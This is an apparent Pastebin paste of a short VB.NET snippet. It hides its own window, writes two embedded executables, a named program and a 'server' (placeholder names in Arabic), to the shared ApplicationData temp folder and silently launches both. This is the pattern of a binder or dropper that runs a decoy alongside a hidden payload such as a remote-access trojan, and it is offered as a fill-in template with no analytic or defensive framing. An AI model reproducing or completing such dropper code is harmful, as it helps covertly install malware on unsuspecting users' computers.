Advertisement
Guest User

Untitled

a guest
Mar 26th, 2017
1,512
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.85 KB | None | 0 0
  1.  
  2. Me.ShowInTaskbar = False
  3. Me.Hide()
  4. Me.Visible = False
  5.  
  6. Dim karrar As String = My.Computer.FileSystem.SpecialDirectories.AllUsersApplicationData + "\temp\"
  7. System.IO.Directory.CreateDirectory(karrar)
  8. IO.File.WriteAllBytes(karrar & "اسم البرنامج هنا.exe", My.Resources.اسم البرنامج هنا)
  9. Process.Start(karrar & "اسم البرنامج هنا.exe")
  10.  
  11.  
  12.  
  13. Dim karrar9 As String = My.Computer.FileSystem.SpecialDirectories.AllUsersApplicationData + "\temp\"
  14. System.IO.Directory.CreateDirectory(karrar9)
  15. IO.File.WriteAllBytes(karrar & "اسم السيرفر هنا.exe", My.Resources.اسم السيرفر هنا)
  16. Process.Start(karrar9 & "اسم السيرفر هنا.exe")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement